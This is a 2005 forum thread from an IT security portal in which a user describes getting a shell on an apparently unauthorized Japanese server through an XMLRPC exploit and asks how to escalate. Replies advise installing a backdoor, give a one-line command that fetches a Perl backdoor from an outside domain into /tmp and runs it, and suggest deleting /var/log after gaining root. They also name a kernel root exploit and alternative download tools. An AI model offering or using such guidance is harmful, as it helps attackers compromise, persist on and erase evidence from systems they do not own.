Waraxe IT Security Portal
Login or Register
July 27, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 219
Members: 0
Total: 219
Full disclosure
CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus
[KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability
[KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability
CVE-2024-33326
CVE-2024-33327
CVE-2024-33328
CVE-2024-33329
CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100
SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice
SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products
Novel DoS Vulnerability Affecting WebRTC Media Servers
APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8
40 vulnerabilities in Toshiba Multi-Function Printers
17 vulnerabilities in Sharp Multi-Function Printers
SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise)
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Newbies corner -> new XMLRPC exploit , i've got the shell , and now.. ?
Post new topicReply to topic View previous topic :: View next topic
new XMLRPC exploit , i've got the shell , and now.. ?
PostPosted: Thu Jul 07, 2005 2:49 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18




..use your brain . Yes I did , I did..

=> exploit <=

but , here's the problem : with this exploit , I can do only some uname , ls , pwd etc.. command , not really usely . Usely , only if I want to know some programm version , where I am , the kernel etc.. But , I can do anything with that .

And , If the server is on safe mode , in french we said "DTC" (Dans ton Cul) as "In Your Ass" Razz

So , ok , actually , on the compromise system , I am only a simple user who can't change repertory .

What can I do ? are they some good things to do ?

(I don't want to break anything , I don't want to make it a deface , It's not interesting , I'd like to know how to get a root acces , for exemple)
View user's profile Send private message
PostPosted: Thu Jul 07, 2005 3:45 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




how about wget command.
install backdoor
run local exploit (depend on platform) to gain root access.
View user's profile Send private message Visit poster's website
PostPosted: Thu Jul 07, 2005 4:23 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18




seem to work ,but I am stupid , the compromise post seemed to be japanese , I don't understand anything..

I ll try on another machine

/edit : when I try "rm /var/log/*" I ve no error message , but when I try another "ls /var/log/" , all log are here .

duno why , but , I can do a "more /etc/passwd" , but I can't no a "rm" command . Any idee ?


Last edited by petitmaitreblanc on Thu Jul 07, 2005 4:33 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Thu Jul 07, 2005 4:28 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




compromise ?

oohh its the same.. only running on windows xp and jp google.

command are same.. its doesnt affect at all.
View user's profile Send private message Visit poster's website
PostPosted: Thu Jul 07, 2005 7:45 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18




wget dosen't work . I can see all find I want on the system , execute a lot of thing , but can't write anything , and can't get out of the /home/blogdb .

Am I in a jail (chrooted so ?) ? How can I get more rights and get out of the jail ?
View user's profile Send private message
PostPosted: Fri Jul 08, 2005 9:11 am Reply with quote
KingOfSka
Advanced user
Advanced user
Joined: Mar 13, 2005
Posts: 61




do a uname -a to see what os is running, then try to find a folder with rw access, usually are the temp one, then upload an exploit for the os or some software installed and gain root Very Happy it worked for me
View user's profile Send private message Visit poster's website
PostPosted: Sun Jul 10, 2005 7:21 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18




ok..

A uname -ra gave me that :
Code:
Linux ********.jp 2.6.7-1.494.2.2smp #1 SMP Tue Aug 3 09:59:49 EDT 2004 i686 i686 i386 GNU/Linux


So , I search and found local root exploit . I saw that /tmp is on drwxrwxrwx , so it's my first touch..

So if I am in right , the good way is to download from the victim's shell (as user "nobody) my exploit . But , my problem is that I can't upload it by the command : wget -O way.to.exploit /tmp/exp .
This command don't work on the victim .
Anyway , what can i do ?
View user's profile Send private message
PostPosted: Mon Jul 11, 2005 2:42 am Reply with quote
y3dips
Valuable expert
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




KingOfSka wrote:
do a uname -a to see what os is running, then try to find a folder with rw access, usually are the temp one, then upload an exploit for the os or some software installed and gain root Very Happy it worked for me



for specific distro
try cat /etc/issue

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Mon Jul 11, 2005 2:08 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




Code:
cd /tmp;wget mydomain.com/perlbackdoor;perl perlbackdoor


so have no problem.

you cannot delete cause you are not root Wink
unless u gained root access.. and then u can rm -rf /var/log

;P
View user's profile Send private message Visit poster's website
PostPosted: Fri Jul 15, 2005 2:26 pm Reply with quote
petitmaitreblanc
Regular user
Regular user
Joined: Jul 05, 2005
Posts: 18




subzero wrote:
Code:
cd /tmp;wget mydomain.com/perlbackdoor;perl perlbackdoor


so have no problem.

you cannot delete cause you are not root Wink
unless u gained root access.. and then u can rm -rf /var/log

;P

hum , damn.. didn't find any rooting exploit for fedora core 1 (or , one , but compiling make me a lot of coding errors) .
View user's profile Send private message
PostPosted: Sat Jul 16, 2005 2:17 pm Reply with quote
LINUX
Moderator
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman




petitmaitreblanc wrote:
ok..

A uname -ra gave me that :
Code:
Linux ********.jp 2.6.7-1.494.2.2smp #1 SMP Tue Aug 3 09:59:49 EDT 2004 i686 i686 i386 GNU/Linux


So , I search and found local root exploit . I saw that /tmp is on drwxrwxrwx , so it's my first touch..

So if I am in right , the good way is to download from the victim's shell (as user "nobody) my exploit . But , my problem is that I can't upload it by the command : wget -O way.to.exploit /tmp/exp .
This command don't work on the victim .
Anyway , what can i do ?


wget not work ? use curl, lynx, GET

2.6.7-1.494.2.2smp > this kernel its possible root by ./krad 2 or 3 - stackgrow2
View user's profile Send private message Visit poster's website
new XMLRPC exploit , i've got the shell , and now.. ?
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.393 Seconds